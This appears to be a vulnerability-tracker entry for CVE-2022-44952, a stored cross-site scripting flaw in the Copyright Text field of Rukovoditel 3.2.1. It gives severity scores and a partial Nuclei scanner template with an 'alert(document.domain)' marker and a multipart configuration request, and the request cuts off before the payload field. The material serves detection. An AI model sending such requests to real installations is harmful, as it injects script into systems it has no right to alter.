CVE-2022-44952
Published 2022-12-02
Priority: P429 | Severity: medium | CVSS 3.1 score: 5.4
Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
EXPLOIT
EPSS: 0.91% (55.4th percentile)
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add".
Affected: 1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rukovoditel | rukovoditel | — | — |
No detection rules found.
Nuclei
Rukovoditel <= 3.2.1 - Cross Site Scripting
nuclei·CVSS 5.4
CVE-2022-44952 [MEDIUM] Rukovoditel <= 3.2.1 - Cross Site Scripting
Rukovoditel alert(document.domain)
```
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"

english.php
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_SKIN]"


------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"

America/New_York
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"

10
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"

m/d/Y
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"

m/d/Y H:i
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"

2/./*
-
```
No writeups or analysis indexed.
Published: 2022-12-02